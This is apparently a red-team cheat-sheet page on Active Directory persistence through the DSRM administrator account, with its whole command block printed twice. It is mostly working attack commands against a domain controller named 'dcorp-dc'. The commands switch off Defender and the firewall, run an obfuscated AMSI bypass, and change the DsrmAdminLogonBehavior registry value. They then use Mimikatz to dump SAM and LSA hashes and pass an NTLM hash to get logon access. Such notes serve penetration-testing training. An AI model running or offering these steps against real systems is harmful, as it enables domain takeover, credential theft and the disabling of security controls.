Persistence - DSRM

DSRM is Directory Services Restore Mode.
There is a local administrator on every DC called "Administrator" whose password is the DSRM password.
DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed.
After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.
Needs DA Priv

DSRM

#From the Domain Admin Powershell Permission
#Create Session
$sess = New-PSSession -ComputerName dcorp-dc

#Disable Firewall and AV
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
Invoke-Command -Session $sess -FilePath c:\AD\Tools\Invoke-mimikatz.ps1
#ByPass AMSI
powershell -ep bypass
SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )


#Enter Session
Enter-PSSession $sess

#Enter New KeyReg
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
#If KeyReg Exist:
#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"
#If DsrmAdminLogonBehavior is not set to 2
Set-ItemProperty -Name "DsrmAdminLogonBehavior" -Value 2
#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"


#Compare the Administrator hash with the Administrator hash of below command
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc


#Dump DSRM password (needs DA privs) to be used for the command below
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

---
#Use below command to pass the hash. Use the hash from the above command
#Needs to be excute from another powershell windows with local admin
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

#Session
$sess = New-PSSession -ComputerName dcorp-dc
Enter-PSSession $sess
#or
ls \\dcorp-dc\c$

Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"

we can see that DsrmAdminLogonBehavior is set to 2

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

PreviousPersistence – Custom SSP NextPersistence - Skeleton Key

Last updated 4 years ago

Was this helpful?

DSRM

#From the Domain Admin Powershell Permission
#Create Session
$sess = New-PSSession -ComputerName dcorp-dc

#Disable Firewall and AV
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
Invoke-Command -Session $sess -FilePath c:\AD\Tools\Invoke-mimikatz.ps1
#ByPass AMSI
powershell -ep bypass
SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )


#Enter Session
Enter-PSSession $sess

#Enter New KeyReg
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
#If KeyReg Exist:
#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"
#If DsrmAdminLogonBehavior is not set to 2
Set-ItemProperty -Name "DsrmAdminLogonBehavior" -Value 2
#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"


#Compare the Administrator hash with the Administrator hash of below command
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc


#Dump DSRM password (needs DA privs) to be used for the command below
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

---
#Use below command to pass the hash. Use the hash from the above command
#Needs to be excute from another powershell windows with local admin
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

#Session
$sess = New-PSSession -ComputerName dcorp-dc
Enter-PSSession $sess
#or
ls \\dcorp-dc\c$

Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"

we can see that DsrmAdminLogonBehavior is set to 2

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc